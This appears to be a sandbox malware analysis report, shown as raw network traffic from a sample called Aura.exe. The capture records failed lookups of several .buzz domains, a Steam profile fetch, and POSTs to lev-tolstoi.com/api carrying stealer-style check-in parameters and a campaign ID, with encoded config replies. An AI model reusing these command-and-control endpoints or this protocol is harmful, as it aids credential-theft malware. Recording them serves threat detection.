                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:48.165105104 CET49747443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:48.165766954 CET49747443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:48.165779114 CET44349747104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:49.425071001 CET44349747104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:49.425230026 CET49747443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:49.427434921 CET49747443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:49.427444935 CET44349747104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:49.427644014 CET44349747104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:49.441061974 CET49747443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:49.441087008 CET49747443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:49.441132069 CET44349747104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:50.180500984 CET44349747104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:50.180545092 CET44349747104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:50.180571079 CET44349747104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:50.180615902 CET49747443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:50.180634975 CET44349747104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:50.181067944 CET44349747104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:50.181097984 CET44349747104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:50.181128979 CET49747443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:50.181135893 CET44349747104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:50.181162119 CET49747443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:50.189495087 CET44349747104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:50.189589024 CET49747443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:50.189600945 CET44349747104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:50.206131935 CET44349747104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:50.207284927 CET49747443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:50.207292080 CET44349747104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:50.210386992 CET44349747104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:50.210453987 CET49747443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:50.210457087 CET44349747104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:50.210612059 CET49747443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:50.210756063 CET49747443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:50.210767984 CET44349747104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:50.210788012 CET49747443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:50.210797071 CET44349747104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:24.700731993 CET6031553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:24.839672089 CET53603151.1.1.1192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:24.842909098 CET5311453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:24.980928898 CET53531141.1.1.1192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:24.988600016 CET5240053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:25.126113892 CET53524001.1.1.1192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:25.130359888 CET5707553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:25.267863035 CET53570751.1.1.1192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:25.269396067 CET5410153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:25.406898022 CET53541011.1.1.1192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:25.410088062 CET6411453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:25.547748089 CET53641141.1.1.1192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:25.554194927 CET5382653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:25.692828894 CET53538261.1.1.1192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:25.767893076 CET6480953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:25.905415058 CET53648091.1.1.1192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:25.922873974 CET6025753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:26.060611963 CET53602571.1.1.1192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:26.199702024 CET6041553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:26.424935102 CET53604151.1.1.1192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:28.892371893 CET5581853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:29.072751045 CET53558181.1.1.1192.168.2.4
                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:24.700731993 CET192.168.2.41.1.1.10xbb65Standard query (0)mindhandru.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:24.842909098 CET192.168.2.41.1.1.10x4d07Standard query (0)prisonyfork.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:24.988600016 CET192.168.2.41.1.1.10xf34Standard query (0)rebuildeso.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:25.130359888 CET192.168.2.41.1.1.10x94b8Standard query (0)scentniej.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:25.269396067 CET192.168.2.41.1.1.10xf260Standard query (0)inherineau.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:25.410088062 CET192.168.2.41.1.1.10xc33fStandard query (0)screwamusresz.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:25.554194927 CET192.168.2.41.1.1.10xaf7cStandard query (0)appliacnesot.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:25.767893076 CET192.168.2.41.1.1.10x5e94Standard query (0)cashfuzysao.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:25.922873974 CET192.168.2.41.1.1.10x8ef5Standard query (0)hummskitnj.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:26.199702024 CET192.168.2.41.1.1.10x995eStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:28.892371893 CET192.168.2.41.1.1.10x3472Standard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:24.839672089 CET1.1.1.1192.168.2.40xbb65Name error (3)mindhandru.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:24.980928898 CET1.1.1.1192.168.2.40x4d07Name error (3)prisonyfork.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:25.126113892 CET1.1.1.1192.168.2.40xf34Name error (3)rebuildeso.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:25.267863035 CET1.1.1.1192.168.2.40x94b8Name error (3)scentniej.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:25.406898022 CET1.1.1.1192.168.2.40xf260Name error (3)inherineau.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:25.547748089 CET1.1.1.1192.168.2.40xc33fName error (3)screwamusresz.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:25.692828894 CET1.1.1.1192.168.2.40xaf7cName error (3)appliacnesot.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:25.905415058 CET1.1.1.1192.168.2.40x5e94Name error (3)cashfuzysao.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:26.060611963 CET1.1.1.1192.168.2.40x8ef5Name error (3)hummskitnj.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:26.424935102 CET1.1.1.1192.168.2.40x995eNo error (0)steamcommunity.com23.55.153.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:29.072751045 CET1.1.1.1192.168.2.40x3472No error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:29.072751045 CET1.1.1.1192.168.2.40x3472No error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  • steamcommunity.com
                                                                                                                                                                                                                                                  • lev-tolstoi.com
                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  0192.168.2.44973423.55.153.1064437412C:\Users\user\Desktop\Aura.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-27 22:47:27 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: steamcommunity.com
                                                                                                                                                                                                                                                  2024-12-27 22:47:28 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 22:47:28 GMT
                                                                                                                                                                                                                                                  Content-Length: 35121
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: sessionid=03b3ce6361d570aed46411eb; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                  Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                  2024-12-27 22:47:28 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                                  2024-12-27 22:47:28 UTC10097INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                                                                  Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
                                                                                                                                                                                                                                                  2024-12-27 22:47:28 UTC10545INData Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74
                                                                                                                                                                                                                                                  Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  1192.168.2.449735104.21.66.864437412C:\Users\user\Desktop\Aura.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-27 22:47:30 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 8
                                                                                                                                                                                                                                                  Host: lev-tolstoi.com
                                                                                                                                                                                                                                                  2024-12-27 22:47:30 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                  Data Ascii: act=life
                                                                                                                                                                                                                                                  2024-12-27 22:47:31 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 22:47:30 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=d1oraocf0383k6ovq8aisrhbpd; expires=Tue, 22 Apr 2025 16:34:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1E6lemEq4ip3qo0nvSK1K5L3LD%2FkxUMLBZJuQBs9LX91E4IA74dquW5NxthZ36xlXRaRxNbocggQuOEM%2FP1BCZxOOEvu1O0floB6oVasi%2BRmgy34yiKw3V%2BpHulORLkUDbA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8f8cda501811de95-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1509&min_rtt=1501&rtt_var=579&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1862244&cwnd=240&unsent_bytes=0&cid=fc11e74a8afc3358&ts=770&x=0"
                                                                                                                                                                                                                                                  2024-12-27 22:47:31 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 2ok
                                                                                                                                                                                                                                                  2024-12-27 22:47:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  2192.168.2.449736104.21.66.864437412C:\Users\user\Desktop\Aura.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-27 22:47:32 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 52
                                                                                                                                                                                                                                                  Host: lev-tolstoi.com
                                                                                                                                                                                                                                                  2024-12-27 22:47:32 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 56 6e 55 71 6f 2d 2d 40 68 69 74 6f 6b 34 31 31 31 26 6a 3d
                                                                                                                                                                                                                                                  Data Ascii: act=recive_message&ver=4.0&lid=BVnUqo--@hitok4111&j=
                                                                                                                                                                                                                                                  2024-12-27 22:47:33 UTC1121INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 22:47:32 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=tgli6lgfectt7l049mmqdissb1; expires=Tue, 22 Apr 2025 16:34:11 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VtMLVGqXWgbeiTT2FEgrSuM4nAEWsSBi18RLSwpO%2BijpMH66O%2BBWRS7mqCVfSxh73NcR24B80mxGx9NZSJvhPU1WHr5XaGJGby2Opsa3nTk5CPtLHbO6S5loZbNV2q8fxU4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8f8cda5cec4d420b-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1627&min_rtt=1617&rtt_var=627&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=951&delivery_rate=1717647&cwnd=136&unsent_bytes=0&cid=cfc92c59e7d691a1&ts=781&x=0"
                                                                                                                                                                                                                                                  2024-12-27 22:47:33 UTC248INData Raw: 34 39 31 63 0d 0a 6d 6a 78 43 6b 76 62 4e 69 77 4c 48 76 36 56 30 6f 6c 47 53 31 4a 2f 65 36 37 4c 47 38 2b 63 45 32 75 39 49 57 56 6b 79 64 4b 6a 68 48 6a 53 77 7a 50 6d 6e 49 4c 54 61 68 30 37 57 49 2b 65 78 73 2f 79 4b 31 75 54 4a 67 57 57 32 6e 43 31 31 65 30 51 5a 69 71 42 61 49 2f 36 46 71 4b 63 67 6f 73 65 48 54 76 6b 71 73 4c 48 78 2f 4e 47 51 6f 35 6d 46 5a 62 61 4e 4b 54 49 32 51 68 6a 4c 38 6c 41 6c 2b 70 4f 75 37 32 4f 72 30 73 41 52 78 7a 44 34 75 76 61 7a 67 39 2f 6b 33 38 56 68 6f 4d 31 79 65 78 52 58 41 4d 6e 58 58 54 48 35 31 4c 43 6e 65 65 58 61 79 31 61 59 63 2f 4f 78 2f 62 4b 4e 31 71 32 62 6a 32 79 2b 6a 43 77 7a 4b 56 73 53 77 50 4a 65 4a 76 75 5a 70 2f 74 75 6f 64 58 4c 46 38 30 77 73 50 69 39 75 35 47 51 2f 4e
                                                                                                                                                                                                                                                  Data Ascii: 491cmjxCkvbNiwLHv6V0olGS1J/e67LG8+cE2u9IWVkydKjhHjSwzPmnILTah07WI+exs/yK1uTJgWW2nC11e0QZiqBaI/6FqKcgoseHTvkqsLHx/NGQo5mFZbaNKTI2QhjL8lAl+pOu72Or0sARxzD4uvazg9/k38VhoM1yexRXAMnXXTH51LCneeXay1aYc/Ox/bKN1q2bj2y+jCwzKVsSwPJeJvuZp/tuodXLF80wsPi9u5GQ/N
                                                                                                                                                                                                                                                  2024-12-27 22:47:33 UTC1369INData Raw: 48 57 56 4c 75 63 4f 79 34 32 51 42 43 4b 35 78 41 35 73 4a 4f 6a 71 54 6a 6c 31 63 73 59 78 54 44 2f 73 66 79 38 6d 39 2b 6b 6b 6f 31 75 76 49 63 6c 4e 44 52 65 48 4d 33 77 56 79 66 2f 6b 36 66 76 62 36 61 64 69 56 62 48 4b 37 44 75 76 5a 79 5a 30 36 65 46 69 48 66 34 6b 6d 51 69 65 31 63 61 69 71 41 65 4a 76 36 56 6f 75 6c 79 72 64 62 4d 45 39 49 34 2b 62 76 77 76 49 54 61 71 35 4b 46 59 62 4b 48 4a 54 45 2f 58 52 76 4d 2b 46 35 67 76 74 53 6f 38 53 44 39 6e 65 51 54 30 44 54 38 6f 4c 2b 47 79 63 2f 71 69 4d 56 68 74 4d 31 79 65 7a 4e 56 46 63 6e 7a 55 53 50 34 6e 37 33 70 63 71 50 51 77 67 54 47 4e 76 36 38 2f 71 36 44 33 71 4b 53 6a 47 32 78 69 43 30 2f 65 78 35 57 7a 65 41 65 65 4c 43 31 6f 75 4a 73 72 38 72 48 56 74 39 39 36 66 62 36 73 4d 6d 49 35
                                                                                                                                                                                                                                                  Data Ascii: HWVLucOy42QBCK5xA5sJOjqTjl1csYxTD/sfy8m9+kko1uvIclNDReHM3wVyf/k6fvb6adiVbHK7DuvZyZ06eFiHf4kmQie1caiqAeJv6VoulyrdbME9I4+bvwvITaq5KFYbKHJTE/XRvM+F5gvtSo8SD9neQT0DT8oL+Gyc/qiMVhtM1yezNVFcnzUSP4n73pcqPQwgTGNv68/q6D3qKSjG2xiC0/ex5WzeAeeLC1ouJsr8rHVt996fb6sMmI5
                                                                                                                                                                                                                                                  2024-12-27 22:47:33 UTC1369INData Raw: 34 77 32 6f 38 49 78 42 4f 69 74 4a 64 4e 50 4f 65 37 64 78 6a 71 39 50 41 41 49 41 73 76 71 2b 39 75 34 57 51 2f 4e 47 49 5a 37 43 4c 4f 44 51 32 55 78 6a 45 39 31 73 76 2b 4a 53 76 35 47 57 68 31 73 77 56 7a 54 66 69 76 50 32 30 6a 4e 47 75 6d 38 55 6f 2b 49 6f 79 65 32 4d 51 4a 39 33 7a 48 42 58 7a 6d 71 48 75 64 75 58 43 69 51 2b 41 4e 50 7a 32 70 66 79 45 32 4b 47 55 69 6d 65 79 67 79 38 78 4e 31 67 59 79 65 70 52 4a 50 43 59 70 2b 4e 74 71 39 6e 50 48 38 73 34 39 72 62 38 74 73 6d 65 35 4a 61 64 4a 75 44 4e 48 6a 77 33 58 52 6d 49 7a 56 30 75 2f 70 4f 35 71 58 2f 72 78 49 63 52 7a 48 4f 6f 39 76 47 31 69 64 75 75 6c 59 56 68 74 59 67 70 50 44 68 64 45 63 44 32 57 53 54 38 6e 61 4c 76 59 4b 4c 5a 77 67 54 46 4f 76 79 36 76 66 4c 4a 31 37 7a 52 33 53
                                                                                                                                                                                                                                                  Data Ascii: 4w2o8IxBOitJdNPOe7dxjq9PAAIAsvq+9u4WQ/NGIZ7CLODQ2UxjE91sv+JSv5GWh1swVzTfivP20jNGum8Uo+Ioye2MQJ93zHBXzmqHuduXCiQ+ANPz2pfyE2KGUimeygy8xN1gYyepRJPCYp+Ntq9nPH8s49rb8tsme5JadJuDNHjw3XRmIzV0u/pO5qX/rxIcRzHOo9vG1iduulYVhtYgpPDhdEcD2WST8naLvYKLZwgTFOvy6vfLJ17zR3S
